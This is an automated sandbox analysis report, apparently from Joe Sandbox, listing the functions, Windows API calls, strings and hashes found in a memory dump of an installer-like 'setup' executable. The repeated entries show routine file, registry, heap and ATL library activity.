                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-2454113998
                                                                                                                                                                              • Opcode ID: e530c54735ffe84c9857d1c15b02269090619b693cc172bf17b5b4c7ee1a6992
                                                                                                                                                                              • Instruction ID: 87ddb64ee7b5ea7efabc44630063662377239f460908492a55eb4e34f2498939
                                                                                                                                                                              • Opcode Fuzzy Hash: e530c54735ffe84c9857d1c15b02269090619b693cc172bf17b5b4c7ee1a6992
                                                                                                                                                                              • Instruction Fuzzy Hash: 24916C30D0820AEFDB24DFA8C895BEDB7F1EF59300F248169E411B7291EB719A45CB60
                                                                                                                                                                              Function 00BB6B00 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 119COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C,E5106CA8,00000002,00000000,00DAB45D,000000FF,?,00BB5A77,00000002,00000000,E5106CA8), ref: 00BB6B3D
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BB6BB8
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BB6C5E
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB6CB3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalCursorLoadSection$EnterLeave
                                                                                                                                                                              • String ID: v$0$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                                                              • API String ID: 3727441302-556780245
                                                                                                                                                                              • Opcode ID: ef574327c052801ff36cc9b966d51d2b8b2098062b6490566f3731ea32de6f4c
                                                                                                                                                                              • Instruction ID: ea7993f295b3026148d952e67481dbb2ad69d9be38a51eac408fac067267e119
                                                                                                                                                                              • Opcode Fuzzy Hash: ef574327c052801ff36cc9b966d51d2b8b2098062b6490566f3731ea32de6f4c
                                                                                                                                                                              • Instruction Fuzzy Hash: BB51F4B1C01218AFDB11CFA5D855BEEBBF8FB09314F14026AE504F7291DBB55A49CBA0
                                                                                                                                                                              Function 00D8AA27 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                              • String ID: :$f$f$f$p$p$p
                                                                                                                                                                              • API String ID: 3732870572-1434680307
                                                                                                                                                                              • Opcode ID: 3b65c5932bf440d7ad3596d66a5a4aba67dfb1bbbd0858029a693efee8d38b20
                                                                                                                                                                              • Instruction ID: 241fc3534a01892f4eee872c5ee23e96d50ffbaad4f3d7210d73c74e5cc4a89f
                                                                                                                                                                              • Opcode Fuzzy Hash: 3b65c5932bf440d7ad3596d66a5a4aba67dfb1bbbd0858029a693efee8d38b20
                                                                                                                                                                              • Instruction Fuzzy Hash: A202A4B5A002189BEF24AF6CC4446EEB7B6FF40B14F648117E555BB284D3348E85CB76
                                                                                                                                                                              Function 00CCF460 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 414fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,E5106CA8,000000D8,?), ref: 00CCF5A9
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00CCF91A
                                                                                                                                                                                • Part of subcall function 00CCF370: LoadStringW.USER32(000000D8,?,00000514,E5106CA8), ref: 00CCF3C6
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 00CCF61B
                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,00000000), ref: 00CCF8BC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Init_thread_footerRead$CloseCreateHandleHeapLoadProcessString
                                                                                                                                                                              • String ID: Ls
                                                                                                                                                                              • API String ID: 1714711150-1452845052
                                                                                                                                                                              • Opcode ID: 8c31da1940dfcd06a5524ccb443bc28fe31b74f90edf5da4b783583f83585a19
                                                                                                                                                                              • Instruction ID: 0d26086abd385404b627ca1f36c386ec68767d601a95c8a8a39a41753434aa37
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c31da1940dfcd06a5524ccb443bc28fe31b74f90edf5da4b783583f83585a19
                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF19071D00308DBDB14CFA8C949BAEBBB5FF45714F20826DE425BB291D774AA46CB90
                                                                                                                                                                              Function 00BBE180 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 150fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BBE26F
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,E5106CAA), ref: 00BBE2C3
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BBE320
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00BBE387
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00D7CF5B), ref: 00BBE3AD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
                                                                                                                                                                              • String ID: Ls$aix$html
                                                                                                                                                                              • API String ID: 2030708724-130826793
                                                                                                                                                                              • Opcode ID: 4b1441dd26ffec3ad43189fd9c72b0fe9c48396760419a4178db3966820ff1bc
                                                                                                                                                                              • Instruction ID: 6e73356f5937b870a465dfb3714ad38fac921c0c17de11a5499d7dbcb755e74e
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b1441dd26ffec3ad43189fd9c72b0fe9c48396760419a4178db3966820ff1bc
                                                                                                                                                                              • Instruction Fuzzy Hash: 20619A70901248DFDB10CFA4D949BEEBBF4FB8A708F244159E011BB2D1D7B56948CBA1
                                                                                                                                                                              Function 00D7F694 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,00D7F98B,00E9FF20,?,00000000,?,?,00BB8C54,00000000), ref: 00D7F6A6
                                                                                                                                                                              • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00D7F98B,00E9FF20,?,00000000,?,?,00BB8C54,00000000), ref: 00D7F6BB
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7F737
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DecodePointer$LibraryLoad
                                                                                                                                                                              • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                                                                              • API String ID: 1423960858-1745123996
                                                                                                                                                                              • Opcode ID: 6c7ea14ebb6fc1a2ab71ed086a0c12438ea71510fb947d4f254933adc0ed0647
                                                                                                                                                                              • Instruction ID: 1878a13fe61e8571abf206f3c1c0bd547a3537c80196add050e96419a8ab82b8
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c7ea14ebb6fc1a2ab71ed086a0c12438ea71510fb947d4f254933adc0ed0647
                                                                                                                                                                              • Instruction Fuzzy Hash: 3B01C4317493007ADE2D5B109D47BE977548F12744F284070FC48BB2D6E6918589D2B5
                                                                                                                                                                              Function 00BA97E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 240COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BA98C5
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BA9910
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: </a>$<a href="$<a>$Hi$Hi
                                                                                                                                                                              • API String ID: 1385522511-4214971700
                                                                                                                                                                              • Opcode ID: 776c7b1ec71824e5aa8f36ba54b2e2426cebddf56ba3b2a58cd5e3538db8ab3f
                                                                                                                                                                              • Instruction ID: 755e41ccc0fc7f1435105e77e529ef2c140ed1b2ea9c6c91a84cc23daabd0706
                                                                                                                                                                              • Opcode Fuzzy Hash: 776c7b1ec71824e5aa8f36ba54b2e2426cebddf56ba3b2a58cd5e3538db8ab3f
                                                                                                                                                                              • Instruction Fuzzy Hash: 4BA1A070A04708DFCB14DF64C945BAEB7F1FF8A314F144299E426AB2D1EB70A949CB61
                                                                                                                                                                              Function 00BA2830 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00EA1668,00000000,E5106CA8,00000000,00DE7E63,000000FF,?,E5106CA8), ref: 00BA29A3
                                                                                                                                                                              • GetLastError.KERNEL32(?,E5106CA8), ref: 00BA29AD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                                                                                              • String ID: VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
                                                                                                                                                                              • API String ID: 439134102-34576578
                                                                                                                                                                              • Opcode ID: 115ece894ca24fdc85d29225f1a540aa4b25f397daa5c9ca6dfeae19eba36fd9
                                                                                                                                                                              • Instruction ID: 6eab475e4491b0fa11df670ca1eaa7ae4b6f610ad8dbe3c83c15b8d203c2d534
                                                                                                                                                                              • Opcode Fuzzy Hash: 115ece894ca24fdc85d29225f1a540aa4b25f397daa5c9ca6dfeae19eba36fd9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0A51F3B1904259DFCB10DF99DD0679E7BF4EB4A720F1842A9E814F7380E774A908CB61
                                                                                                                                                                              Function 00D7F7A0 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7C4
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F7CB
                                                                                                                                                                                • Part of subcall function 00D7F896: IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F7B2,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F898
                                                                                                                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7DB
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,00BB8164,?), ref: 00D7F802
                                                                                                                                                                              • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,00BB8164,?), ref: 00D7F816
                                                                                                                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F829
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00BB8164,?), ref: 00D7F83C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2460949444-0
                                                                                                                                                                              • Opcode ID: eed45bd37e021879e12d93f965e75723763be056be5e48f805d8945b13333367
                                                                                                                                                                              • Instruction ID: 30662b472efdefff37084521541b44ee2faeecd06c91f08c20c3b63995a23234
                                                                                                                                                                              • Opcode Fuzzy Hash: eed45bd37e021879e12d93f965e75723763be056be5e48f805d8945b13333367
                                                                                                                                                                              • Instruction Fuzzy Hash: C111EBB1700611EFE73117AAAC48F27765DFB49785F254131F909F6250EA21CC4887B2
                                                                                                                                                                              Function 00BBE3F0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 285registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,E5106CA8), ref: 00BBE491
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BBE4BA
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00E172AC,00000000,00E172AC,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00BBE72E
                                                                                                                                                                              • CloseHandle.KERNEL32(?,E5106CA8,?,?,00000000,00DAC9ED,000000FF,?,00E172AC,00000000,00E172AC,00000000,?,80000001,00000001,00000000), ref: 00BBE7BE
                                                                                                                                                                              Strings
                                                                                                                                                                              • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00BBE486
                                                                                                                                                                              • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00BBE4F2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$CreateErrorEventHandleLast
                                                                                                                                                                              • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                                                                                              • API String ID: 1253123496-2079760225
                                                                                                                                                                              • Opcode ID: 2679b9806753a327f913400ece0aab7a5cb29d6e0c88c6b817d73bcaff8bfc65
                                                                                                                                                                              • Instruction ID: ae389da7ce0ae965eb21134eb8e832c6f07c847e627f6aef5e9ae4dfc800a0af
                                                                                                                                                                              • Opcode Fuzzy Hash: 2679b9806753a327f913400ece0aab7a5cb29d6e0c88c6b817d73bcaff8bfc65
                                                                                                                                                                              • Instruction Fuzzy Hash: 37C1CF70D00248DFDB24CF68C885BEEBBF4EF54704F10829DE459A7291DBB4AA88CB51
                                                                                                                                                                              Function 00BBC570 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA1648,E5106CA8,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5), ref: 00BBC5DA
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5), ref: 00BBC65A
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA1664,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5,000000FF), ref: 00BBC813
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA1664,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5,000000FF), ref: 00BBC834
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 1807155316-3261393531
                                                                                                                                                                              • Opcode ID: 1c6a1d5330964a2b6f26cbdb22e43c362b9125b96e848297588a1013779196ef
                                                                                                                                                                              • Instruction ID: afc1d3652ff6dadc7831b21c2e34cfc279fcfa943d5c2c912c6b9675cca857ff
                                                                                                                                                                              • Opcode Fuzzy Hash: 1c6a1d5330964a2b6f26cbdb22e43c362b9125b96e848297588a1013779196ef
                                                                                                                                                                              • Instruction Fuzzy Hash: 70B14A70900249DFDB10DBA5D888BFEBBF4EF09314F248599E405AB291DBB5A948CB61
                                                                                                                                                                              Function 00CC95B0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 238registrylibraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,E5106CA8,E5106CA8,?,?), ref: 00CC9806
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00CC9816
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00CC9868
                                                                                                                                                                              Strings
